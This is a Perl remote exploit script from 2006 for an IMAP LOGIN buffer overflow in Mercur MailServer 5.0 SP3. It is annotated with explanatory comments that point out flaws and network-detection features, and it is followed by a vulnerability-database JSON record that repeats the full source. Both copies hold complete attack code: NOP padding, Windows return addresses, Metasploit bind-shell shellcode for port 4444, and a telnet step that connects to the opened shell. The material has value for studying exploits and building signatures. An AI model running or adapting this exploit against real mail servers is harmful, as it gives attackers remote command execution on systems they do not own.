#!/usr/bin/perl
# Tested on Windows 2k Sp4 Italian and English version and Win XP Pro SP2 Italian and English version
# Perl script based on Sami FTP server remote exploit by Critical Security
# https://www.securityfocus.com/bid/17138
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
# Argument count check. With fewer than two arguments the usage text is
# printed, but there is no exit here, so execution continues with the
# defaults declared below ($host = 127.0.0.1, Win2k SP4 return address).
if (@ARGV < 2) {
print "--------------------------------------------------------------------\n";
print "Usage : mercur-login.pl -hTargetIPAddress -oTargetReturnAddress\n";
print " Return address: \n";
print " 1 - 0x0258d087 Windows 2k Sp4 English Italian Version\n";
print " 2 - 0x020cd083 Windows XP Pro SP2 English Italian Version\n";
print " If values not specified, Windows 2k Sp4 will be used.\n";
print " Example : ./mercur-login.pl -h127.0.0.1 -o1\n";
print "--------------------------------------------------------------------\n";
}
my $host = "127.0.0.1";   # target address; overwritten by -h below
my $port = 143;           # IMAP port; the payload goes out as an IMAP LOGIN line
my $reply;                # server banner read right after connect
my $request;              # declared but never used in this script
my $pad = "\x90"x268;     # 268 bytes of 0x90 (NOP) padding placed before the return address
my $eip = "\x87\xd0\x58\x02"; # default eip is for Win2k SP4 (0x0258d087, little-endian)
# Argument parsing. -h is matched loosely (anything containing three dots)
# and the captured value is later interpolated into a shell command (the
# system("telnet ...") call at the end) with no further validation.
# -o captures whatever follows it; the switch below maps it to a return
# address.
foreach (@ARGV) {
$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
$eip = $1 if ($_=~/-o(.*)/);
}
# Map the -o selector to a return address. There is no default case, so an
# unrecognised -o value leaves $eip holding the raw option string.
switch ($eip) {
case 1 { $eip = "\x87\xd0\x58\x02" } # Windows Win2k SP4 English and Italian version
case 2 { $eip = "\x83\xd0\x0c\x02" } # Windows XP SP2 English and Italian version
}
#Metasploit bind 4444 shellcode
# The first four lines (64 bytes) are 0x90 NOPs; the rest is the encoded
# payload exactly as the author supplied it. The whole string is static, so
# on the wire the 268-byte 0x90 padding followed by these bytes inside an
# IMAP LOGIN command is a fixed pattern that a network signature can match.
my $shellcode=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66" .
"\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6" .
"\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa" .
"\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f" .
"\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb" .
"\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba" .
"\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb" .
"\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc" .
"\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61" .
"\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70" .
"\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44" .
"\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7" .
"\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69" .
"\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9" .
"\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0" .
"\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3" .
"\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7" .
"\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0" .
"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67" .
"\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1" .
"\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0" .
"\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88" .
"\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d" .
"\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95" .
"\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2";
# Connect to the IMAP service and read (then echo) the banner.
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
# First LOGIN line: tag, padding, return address and shellcode. $exploit is
# not declared with my (the file does not use strict), and the return value
# of send is not checked.
$exploit = "a001 LOGIN " . $pad. $eip .$shellcode."\r\n";
send $socket, $exploit, 0;
print "[+] sending 1st chunk\n";
# Second LOGIN line: same padding and return address, without the shellcode.
$exploit = "a001 LOGIN " . $pad. $eip ."\r\n";
send $socket, $exploit, 0;
print "[+] sending 2nd chunk\n";
# Hand off to the system telnet client on port 4444. $host is interpolated
# into the command string, so the shell interprets it. On the target side
# the observable artefact is presumably a new TCP/4444 listener opened by
# the mail server process -- confirm; the socket is only closed after
# telnet returns.
print " + connecting port 4444 of $host ...\n";
system("telnet $host 4444");
close $socket;
exit;
# milw0rm.com [2006-09-11]
{"lastseen": "2020-04-01T19:04:31", "references": [], "description": "\nMercur MailServer 5.0 SP3 - IMAP Remote Buffer Overflow (2)", "edition": 1, "reporter": "Jacopo Cervini", "exploitpack": {"type": "remote", "platform": "windows"}, "published": "2006-09-11T00:00:00", "title": "Mercur MailServer 5.0 SP3 - IMAP Remote Buffer Overflow (2)", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:31", "rev": 2}, "score": {"value": 0.4, "vector": "NONE", "modified": "2020-04-01T19:04:31", "rev": 2}, "vulnersScore": 0.4}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-09-11T00:00:00", "id": "EXPLOITPACK:01A5DB7CAB922A3E7A74FA5096DC4B11", "href": "", "viewCount": 1, "sourceData": "#!/usr/bin/perl\n# Tested on Windows 2k Sp4 Italian and English version and Win XP Pro SP2 Italian and English #version\n# Perl script based on Sami FTP server remote exploit by Critical Security\n# https://www.securityfocus.com/bid/17138\n# acaro [at] jervus.it\n\n\nuse IO::Socket::INET;\nuse Switch;\n\nif (@ARGV < 2) {\nprint \"--------------------------------------------------------------------\\n\";\nprint \"Usage : mercur-login.pl -hTargetIPAddress -oTargetReturnAddress\\n\";\nprint \" Return address: \\n\";\nprint \" 1 - 0x0258d087 Windows 2k Sp4 English Italian Version\\n\";\nprint \" 2 - 0x020cd083 Windows XP Pro SP2 English Italian Version\\n\";\nprint \" If values not specified, Windows 2k Sp4 will be used.\\n\";\nprint \" Example : ./mercur-login.pl -h127.0.0.1 -o1\\n\";\nprint \"--------------------------------------------------------------------\\n\";\n}\n\nmy $host = \"127.0.0.1\"; \n\nmy $port = 143;\nmy $reply;\nmy $request;\nmy $pad = \"\\x90\"x268;\nmy $eip = \"\\x87\\xd0\\x58\\x02\"; # default eip is for Win2k SP4\n\n\nforeach (@ARGV) {\n$host = $1 if ($_=~/-h((.*)\\.(.*)\\.(.*)\\.(.*))/);\n$eip = $1 if ($_=~/-o(.*)/);\n}\n\nswitch ($eip) {\ncase 1 { $eip = \"\\x87\\xd0\\x58\\x02\" } # Windows Win2k SP4 
English and Italian version\ncase 2 { $eip = \"\\x83\\xd0\\x0c\\x02\" } # Windows XP SP2 English and Italian version\n}\n\n#Metasploit bind 4444 shellcode\nmy $shellcode=\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" .\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" .\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" .\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" .\n\"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\xe0\\x66\" .\n\"\\x1c\\xc2\\x83\\xeb\\xfc\\xe2\\xf4\\x1c\\x8e\\x4a\\xc2\\xe0\\x66\\x4f\\x97\\xb6\" .\n\"\\x31\\x97\\xae\\xc4\\x7e\\x97\\x87\\xdc\\xed\\x48\\xc7\\x98\\x67\\xf6\\x49\\xaa\" .\n\"\\x7e\\x97\\x98\\xc0\\x67\\xf7\\x21\\xd2\\x2f\\x97\\xf6\\x6b\\x67\\xf2\\xf3\\x1f\" .\n\"\\x9a\\x2d\\x02\\x4c\\x5e\\xfc\\xb6\\xe7\\xa7\\xd3\\xcf\\xe1\\xa1\\xf7\\x30\\xdb\" .\n\"\\x1a\\x38\\xd6\\x95\\x87\\x97\\x98\\xc4\\x67\\xf7\\xa4\\x6b\\x6a\\x57\\x49\\xba\" .\n\"\\x7a\\x1d\\x29\\x6b\\x62\\x97\\xc3\\x08\\x8d\\x1e\\xf3\\x20\\x39\\x42\\x9f\\xbb\" .\n\"\\xa4\\x14\\xc2\\xbe\\x0c\\x2c\\x9b\\x84\\xed\\x05\\x49\\xbb\\x6a\\x97\\x99\\xfc\" .\n\"\\xed\\x07\\x49\\xbb\\x6e\\x4f\\xaa\\x6e\\x28\\x12\\x2e\\x1f\\xb0\\x95\\x05\\x61\" .\n\"\\x8a\\x1c\\xc3\\xe0\\x66\\x4b\\x94\\xb3\\xef\\xf9\\x2a\\xc7\\x66\\x1c\\xc2\\x70\" .\n\"\\x67\\x1c\\xc2\\x56\\x7f\\x04\\x25\\x44\\x7f\\x6c\\x2b\\x05\\x2f\\x9a\\x8b\\x44\" .\n\"\\x7c\\x6c\\x05\\x44\\xcb\\x32\\x2b\\x39\\x6f\\xe9\\x6f\\x2b\\x8b\\xe0\\xf9\\xb7\" .\n\"\\x35\\x2e\\x9d\\xd3\\x54\\x1c\\x99\\x6d\\x2d\\x3c\\x93\\x1f\\xb1\\x95\\x1d\\x69\" .\n\"\\xa5\\x91\\xb7\\xf4\\x0c\\x1b\\x9b\\xb1\\x35\\xe3\\xf6\\x6f\\x99\\x49\\xc6\\xb9\" .\n\"\\xef\\x18\\x4c\\x02\\x94\\x37\\xe5\\xb4\\x99\\x2b\\x3d\\xb5\\x56\\x2d\\x02\\xb0\" .\n\"\\x36\\x4c\\x92\\xa0\\x36\\x5c\\x92\\x1f\\x33\\x30\\x4b\\x27\\x57\\xc7\\x91\\xb3\" 
.\n\"\\x0e\\x1e\\xc2\\xf1\\x3a\\x95\\x22\\x8a\\x76\\x4c\\x95\\x1f\\x33\\x38\\x91\\xb7\" .\n\"\\x99\\x49\\xea\\xb3\\x32\\x4b\\x3d\\xb5\\x46\\x95\\x05\\x88\\x25\\x51\\x86\\xe0\" .\n\"\\xef\\xff\\x45\\x1a\\x57\\xdc\\x4f\\x9c\\x42\\xb0\\xa8\\xf5\\x3f\\xef\\x69\\x67\" .\n\"\\x9c\\x9f\\x2e\\xb4\\xa0\\x58\\xe6\\xf0\\x22\\x7a\\x05\\xa4\\x42\\x20\\xc3\\xe1\" .\n\"\\xef\\x60\\xe6\\xa8\\xef\\x60\\xe6\\xac\\xef\\x60\\xe6\\xb0\\xeb\\x58\\xe6\\xf0\" .\n\"\\x32\\x4c\\x93\\xb1\\x37\\x5d\\x93\\xa9\\x37\\x4d\\x91\\xb1\\x99\\x69\\xc2\\x88\" .\n\"\\x14\\xe2\\x71\\xf6\\x99\\x49\\xc6\\x1f\\xb6\\x95\\x24\\x1f\\x13\\x1c\\xaa\\x4d\" .\n\"\\xbf\\x19\\x0c\\x1f\\x33\\x18\\x4b\\x23\\x0c\\xe3\\x3d\\xd6\\x99\\xcf\\x3d\\x95\" .\n\"\\x66\\x74\\x32\\x6a\\x62\\x43\\x3d\\xb5\\x62\\x2d\\x19\\xb3\\x99\\xcc\\xc2\";\n\n\n\nmy $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);\n$socket or die \"Cannot connect to host!\\n\";\n\nrecv($socket, $reply, 1024, 0);\nprint \"Response:\" . $reply;\n$exploit = \"a001 LOGIN \" . $pad. $eip .$shellcode.\"\\r\\n\";\n\nsend $socket, $exploit, 0;\nprint \"[+] sending 1st chunk\\n\";\n\n$exploit = \"a001 LOGIN \" . $pad. $eip .\"\\r\\n\";\n\nsend $socket, $exploit, 0;\nprint \"[+] sending 2nd chunk\\n\";\n\nprint \" + connecting port 4444 of $host ...\\n\";\nsystem(\"telnet $host 4444\");\n\nclose $socket;\nexit;\n\n# milw0rm.com [2006-09-11]", "cvss": {"score": 0.0, "vector": "NONE"}}